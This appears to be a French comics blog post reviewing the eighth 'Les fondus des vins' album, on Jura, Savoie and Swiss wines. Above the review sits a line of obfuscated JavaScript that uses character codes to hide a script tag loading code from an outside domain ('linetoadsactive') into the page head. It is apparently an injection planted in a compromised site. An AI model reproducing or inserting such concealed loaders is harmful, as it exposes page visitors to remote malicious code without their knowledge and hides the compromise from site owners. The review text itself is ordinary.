Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Les fondus du vin au pays de la fondue

    Les fondus des vins de… Savoie – Jura – Suisse, Christophe Cazenove et Hervé Richez (scénario), Olivier Saive (dessin). Editions Bamboo, 48 pages, 10,60 euros.

    Après avoir éclusé les grands crus de Bordeaux et de Bourgogne, être passés par les Côtes du Rhône, l’Alsace et les Pays de Loire, nos “fondus” abordent cette fois des terroirs  méconnus (la Suisse) ou mésestimés (la Savoie).
    C’est parti pour la découverte du “vin jaune” du Jura aux raisins surmûris, au vieillissement de 6 ans et aux petites bouteilles de 62 cl ; à celle, toujours dans le même massif du “vin de paille”. Plus diffusés, les vins de Savoie, Roussette, Seyssel, Mondeuse ou Chignin-Bergeron, sans oublier le célèbre Apremont. Et il ne se boivent pas tous, de façon rustique, avec une fondue ou une raclette.
    Et le trio révèle aussi, entre autre, l’existence d’étonnants cépages, comme le gringet, uniquement cultivé sur 22 hectares dans le vignoble d’Ayse ou la plus “people” micro-vigne du Farinet, dans le Valais, propriété du Dalaï-Lama et dont les 1,618 m2 sont travaillés chaque année par des vedettes.
    Car, c’est l’autre info: la Suisse ne produit pas que du chocolat et des banques, mais compte aussi quelques crus intéressants, autour du Lac Léman et dans le Tessin notamment.

    Christophe Cazenove, Hervé Richez et Olivier Saive poursuivent donc leur “route des vins”. Un huitième tome, déjà, avec toujours le même mélange de vulgarisation oenologique et de décontraction. Un condensé d’informations très sérieuses et précises sur les cépages, les crus et les particularismes locaux intégrés dans des planches-gags au trait caricatural “gros nez”. Une approche sans prétention mais qui permet à chacun de s’y plonger sans être intimidés.
    Seul bémol, si les planches uniques sont toujours là, les gags s’avèrent particulièrement poussifs et laborieux. L’humour n’atteint pas des sommets, même si la qualité viticole est bien toujours présente.

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Journaliste de profession, rédacteur en chef adjoint (du Courrier picard) de fonction et amateur de bande dessinée par passion, je préfère parler ici d'albums que j'apprécie (avec éclectisme) plutôt que de ceux que je n'aime pas (et qui peuvent plaire à d'autres). Et ce en toute liberté. Cet espace est aussi l'occasion d'évoquer la vie (régionale en premier lieu) de la bande dessinée et parfois au-delà celle du graphisme, du dessin de presse ou des journaux et revues en lien avec l'un ou l'autre. Précisons que la plupart des illustrations utilisées dans ce blog ont pour copyrights leurs auteurs et éditeurs respectifs. Celles-ci visant à présenter leurs œuvres. A leur demande éventuelle, elles seront retirées.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    La lumière vient de Jizo

     Jizo, Mr Tan (scénariste), Mato (dessin). Editions Glénat, 240 pages, 10,75 euros.  Assis sur ...

    Planeta extra, ça déménage

    Planeta extra, Diego Agrimbau (scénario), Gabriel Ippoliti (dessin). Editions Sarbacane, 88 pages, 18 euros. ...

    La vie de Pedro Atias avec mode d’emploi

    Là où se termine la terre, Chili 1948-1970, Désirée et Alain Frappier. Editions Steinkis, ...

    Le sport mène à tout…

    Matt Peterson, tome 1 : London Running, Laurent-Frédéric Bollée et Stom. Casterman et L’Equipe, 56 ...

    Connection illimitée, la BD à l’heure du smartphone

    Illimité, tome 1 : Connexion, Benjamin Ferré, Florent Bonnin, Afif Khaled & Jérôme Lothelier. Editions ...

    Au nom du père

    Profession du père, Sébastien Gnaedig d’après le roman de Sorj Chalandon. Editions Futuropolis, Futuropolis ...